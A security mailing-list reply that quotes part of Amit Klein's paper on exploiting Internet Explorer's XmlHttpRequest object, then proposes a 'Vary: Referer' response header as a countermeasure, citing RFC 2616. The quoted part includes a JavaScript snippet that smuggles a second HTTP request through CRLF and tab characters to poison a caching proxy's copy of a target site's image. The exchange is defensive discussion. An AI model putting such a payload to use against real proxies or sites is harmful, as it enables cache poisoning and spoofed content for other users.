Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein

Amit Klein (AKsecurity) wrote:
> The problem with images, and how it can be solved
> ....
> In this case, one needs to take a different approach. The following 
> will only work when the browser uses a *caching* forward proxy 
> server, and the image is cacheable by the proxy server.
>
>   var x = new ActiveXObject("Microsoft.XMLHTTP");
>
>   x.open("GET\thttp://www.target.site/image.gif\tHTTP/1.0\r\nHo
>   st:\twww.target.site\r\nReferer:\thttp://www.target.site/some
>   path?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP/1.0\r\nFo
>   obar:","http://www.attacker.site/",false);
>
>   x.send();
>
>   document.write("<img 
>   src='http://www.target.site/image.gif'>");

Wouldn't this be easily prevented if www.target.site were to
included a "Vary: Referer" header in its response? I think it
can even reasonably be argued that this is recommended behavior
according to RFC 2616 (Hypertext Transfer Protocol - HTTP/1.1):

"An HTTP/1.1 server SHOULD include a Vary header field with any
cacheable response that is subject to server-driven negotiation."

http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.44


        Bob